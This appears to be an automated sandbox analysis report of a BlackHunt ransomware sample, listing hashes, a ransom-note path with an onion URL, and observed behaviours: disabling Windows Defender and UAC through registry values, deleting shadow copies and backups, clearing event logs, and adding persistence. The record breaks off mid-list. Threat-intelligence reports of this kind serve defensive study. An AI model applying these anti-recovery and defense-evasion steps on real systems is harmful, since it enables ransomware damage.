Analysis
-
max time kernel
35s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
19/01/2024, 00:11
Static task
static1
Behavioral task
behavioral1
Sample
921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe
Resource
win10v2004-20231222-en
General
-
Target
921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe
-
Size
707KB
-
MD5
6537b8a5c39a79073261ba118cb43082
-
SHA1
3eca8733aabc17926a6a8f99a62c39e266ca4203
-
SHA256
921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8
-
SHA512
488d6cfcc6aacb5f397127ed9a33fb22b890aa3bb56f6517047f5a216e137fa163691cb3bcb738cd5cbbf0599ac0f27e27a7513aaf1b08fb1291c292d5701899
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1Q8Pvnh:6uaTmkZJ+naie5OTamgEoKxLWzHh
Malware Config
Extracted
C:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 8856 fsutil.exe 9648 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 14592 wevtutil.exe 14648 wevtutil.exe 14640 wevtutil.exe 14748 wevtutil.exe 14800 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 10228 bcdedit.exe 9988 bcdedit.exe 14840 bcdedit.exe 14880 bcdedit.exe -
Renames multiple (3328) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 8852 wbadmin.exe 15212 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Q: 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened (read-only) \??\W: 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened (read-only) \??\G: 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened (read-only) \??\L: 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened (read-only) \??\X: 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened (read-only) \??\K: 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\I: 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened (read-only) \??\O: 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened (read-only) \??\S: 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened (read-only) \??\V: 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened (read-only) \??\B: 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened (read-only) \??\Y: 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened (read-only) \??\P: 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened (read-only) \??\A: 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened (read-only) \??\H: 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened (read-only) \??\M: 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened (read-only) \??\T: 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened (read-only) \??\N: 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened (read-only) \??\U: 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened (read-only) \??\R: 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened (read-only) \??\J: 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened (read-only) \??\Z: 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\jaccess.jar 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm.html 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\it-it\#BlackHunt_Private.key 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\es-es\#BlackHunt_ReadMe.txt 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\FillnSign_visual.svg 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\es-es\#BlackHunt_ReadMe.hta 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ui-strings.js 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\sv-se\#BlackHunt_ReadMe.txt 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\#BlackHunt_ReadMe.txt 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\nb-no\#BlackHunt_Private.key 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\libxml2.md 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\#BlackHunt_ReadMe.hta 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-il\#BlackHunt_Private.key 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover.png 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pl-pl\#BlackHunt_Private.key 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-ae\ui-strings.js 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\s_opencarat_18.svg 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\#BlackHunt_Private.key 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\#BlackHunt_ReadMe.txt 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ca-es\#BlackHunt_Private.key 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hr-hr\#BlackHunt_Private.key 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\hr-hr\#BlackHunt_ReadMe.txt 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-ma\#BlackHunt_ReadMe.txt 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\cs-cz\ui-strings.js 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sl-si\#BlackHunt_ReadMe.txt 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ja-jp\ui-strings.js 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fi-fi\#BlackHunt_ReadMe.hta 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files\VideoLAN\VLC\plugins\packetizer\#BlackHunt_ReadMe.txt 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\sat_logo_2x.png 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\root\#BlackHunt_Private.key 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia.api 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\de-de\#BlackHunt_Private.key 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ko-kr\ui-strings.js 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\splash.gif 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_ellipses-hover.svg 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\#BlackHunt_ReadMe.hta 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\svgCheckboxSelected.svg 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sk-sk\ui-strings.js 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\de-de\#BlackHunt_ReadMe.txt 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ko-kr\#BlackHunt_Private.key 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sk-sk\ui-strings.js 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files\Java\jdk-1.8\legal\#BlackHunt_ReadMe.hta 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files\VideoLAN\VLC\locale\is\#BlackHunt_ReadMe.txt 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\#BlackHunt_ReadMe.txt 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\#BlackHunt_ReadMe.hta 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nb-no\#BlackHunt_Private.key 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ro-ro\#BlackHunt_ReadMe.hta 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\hr-hr\#BlackHunt_Private.key 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Microsoft.VCLibs.x86.14.00.appx 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\root\#BlackHunt_Private.key 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\#BlackHunt_ReadMe.hta 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\#BlackHunt_ReadMe.txt 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\#BlackHunt_Private.key 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\pl-pl\#BlackHunt_Private.key 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\css\home-view.css 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\#BlackHunt_ReadMe.txt 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\#BlackHunt_Private.key 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\#BlackHunt_ReadMe.hta 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sl-sl\ui-strings.js 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\nb-no\#BlackHunt_Private.key 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\#BlackHunt_Private.key 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\#BlackHunt_ReadMe.hta 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\#BlackHunt_ReadMe.hta 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\vlc.mo 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 15196 15824 WerFault.exe 296 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 9560 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 10252 vssadmin.exe 7716 vssadmin.exe 11392 vssadmin.exe 9552 vssadmin.exe 10792 vssadmin.exe 8864 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 15616 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 9644 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe Token: SeRestorePrivilege 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe Token: SeBackupPrivilege 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe Token: SeTakeOwnershipPrivilege 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe Token: SeAuditPrivilege 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe Token: SeSecurityPrivilege 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe Token: SeIncBasePriorityPrivilege 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe Token: SeBackupPrivilege 9836 vssvc.exe Token: SeRestorePrivilege 9836 vssvc.exe Token: SeAuditPrivilege 9836 vssvc.exe Token: SeBackupPrivilege 10208 wbengine.exe Token: SeRestorePrivilege 10208 wbengine.exe Token: SeSecurityPrivilege 10208 wbengine.exe Token: SeSecurityPrivilege 14592 wevtutil.exe Token: SeBackupPrivilege 14592 wevtutil.exe Token: SeSecurityPrivilege 14640 wevtutil.exe Token: SeBackupPrivilege 14640 wevtutil.exe Token: SeSecurityPrivilege 14648 wevtutil.exe Token: SeBackupPrivilege 14648 wevtutil.exe Token: SeSecurityPrivilege 14748 wevtutil.exe Token: SeBackupPrivilege 14748 wevtutil.exe Token: SeSecurityPrivilege 14800 wevtutil.exe Token: SeBackupPrivilege 14800 wevtutil.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4360 wrote to memory of 2284 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 94 PID 4360 wrote to memory of 2284 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 94 PID 4360 wrote to memory of 5096 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 91 PID 4360 wrote to memory of 5096 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 91 PID 4360 wrote to memory of 1768 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 95 PID 4360 wrote to memory of 1768 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 95 PID 4360 wrote to memory of 5008 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 153 PID 4360 wrote to memory of 5008 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 153 PID 2284 wrote to memory of 4580 2284 cmd.exe 190 PID 2284 wrote to memory of 4580 2284 cmd.exe 190 PID 5096 wrote to memory of 2868 5096 cmd.exe 100 PID 5096 wrote to memory of 2868 5096 cmd.exe 100 PID 4360 wrote to memory of 3132 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 155 PID 4360 wrote to memory of 3132 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 155 PID 1768 wrote to memory of 3380 1768 cmd.exe 148 PID 1768 wrote to memory of 3380 1768 cmd.exe 148 PID 4360 wrote to memory of 4776 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 103 PID 4360 wrote to memory of 4776 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 103 PID 5008 wrote to memory of 4040 5008 cmd.exe 102 PID 5008 wrote to memory of 4040 5008 cmd.exe 102 PID 4360 wrote to memory of 2368 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 106 PID 4360 wrote to memory of 2368 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 106 PID 4360 wrote to memory of 4200 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 160 PID 4360 wrote to memory of 4200 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 160 PID 3132 wrote to memory of 5044 3132 cmd.exe 107 PID 3132 wrote to memory of 5044 3132 cmd.exe 107 PID 4360 wrote to memory of 620 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 110 PID 4360 wrote to memory of 620 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 110 PID 4360 wrote to memory of 4328 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 214 PID 4360 wrote to memory of 4328 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 214 PID 4360 wrote to memory of 2520 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 169 PID 4360 wrote to memory of 2520 4360 921c3457e55ff8db4cd8e018f3d637ef5ac496e53959362a43b0176f65c9ebf8.exe 169 PID 4776 wrote to memory of 1064 4776 cmd.exe 116 PID 4776 wrote to memory of 1064 4776 cmd.exe 116 PID 2368 wrote to memory of 2148 2368 cmd.exe 158 PID 2368 wrote to memory of 2148 2368 cmd.exe 158 PID 4360 wrote to memory of 4132 4360 